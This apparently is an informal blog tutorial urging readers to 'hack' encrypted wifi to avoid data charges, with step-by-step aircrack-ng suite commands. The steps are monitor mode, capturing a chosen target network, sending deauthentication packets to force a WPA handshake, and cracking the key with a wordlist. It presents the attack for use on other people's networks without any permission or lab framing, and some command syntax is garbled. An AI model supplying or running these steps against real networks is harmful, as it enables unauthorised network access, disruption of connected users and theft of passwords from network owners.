Hi Everyone forget about internet data charges..! lets hack encrypted wifi network with simple skills im here to guide you the best way for hacking of wifi network
This method for kali linux users and im gonna make another tutorial for android users ok.lets start our work
open Terminal then follow the given steps ...
step 1- airmon-ng
step 2- airmon-ng start wlan0
step 3- type airodump-ng followed by the name of the new monitor interface
step 4- now it shows wifi signals select the prefered wifi like the image below
step 5- copy the BSSID of target network
step 6- now the the following command airodump-ng -c (channel) --BSSID (PASTE THAT BBSID) -W/root/Desktop/(monitor interface) i.e wlan0 or wlan0mon
for eg., airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0
step 7- now open new terminal then type the following
aireplay-ng -0 4 -a (BSSID) -C (PWR ID) "wlan0mon" or "wlan0"
step 8- after hitting enter you will see the aireplay sends packet after few minutes in the upper right corner u will get HANDSHAKE

step 9- aircrack-ng -a2 -b (wpa handshake id) -w /root/Desktop/wordlist.txt /root/Desktop/.*cap
Now press enter then it search for the target wifi password and shows you the exact key

here the proof..
FOR CREATING WORDLIST VISIT MY YOUTUBE CHANNEL -CLICK HERE


